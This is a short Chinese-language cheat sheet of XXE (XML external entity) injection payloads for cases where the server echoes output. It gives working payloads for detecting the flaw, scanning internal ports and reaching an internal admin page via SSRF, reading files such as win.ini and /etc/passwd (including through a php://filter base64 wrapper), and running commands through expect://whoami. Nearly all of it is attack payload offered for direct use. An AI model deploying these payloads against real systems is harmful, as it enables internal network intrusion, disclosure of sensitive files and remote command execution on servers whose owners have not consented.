有回显 |
直接利用即可 <!--判断是否存在XXE漏洞,返回XXE则存在-->
<?xml version = "1.0"?>
<!DOCTYPE a [<!ENTITY b "XXE">]><c>&b;</c>
<!--扫描内网端口IP-->
<!--如果端口开放,服务器将返回相应的HTTP响应,否则可能超时或返回错误。-->
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "http://192.168.1.1:80" >]>
<root>
<name>&xxe;</name>
</root>
<!--攻击内网网站-->
<!--如果内网中的 192.168.1.2 存在,并且 /admin 路径没有适当的访问控制,XXE攻击可能会成功访问该页面。-->
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "http://192.168.1.2/admin" >]>
<root>
<name>&xxe;</name>
</root>
<!--任意文件读取-->
<!--file协议 查看文件-->
<?xml version="1.0"?>
<!DOCTYPE a[
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<a>&xxe;</a>
<!--php协议 查看文件,并将其转换为Base64编码-->
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
<!--命令执行-->
<?xml version ="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://whoami">
<x>&xxe;</x>
|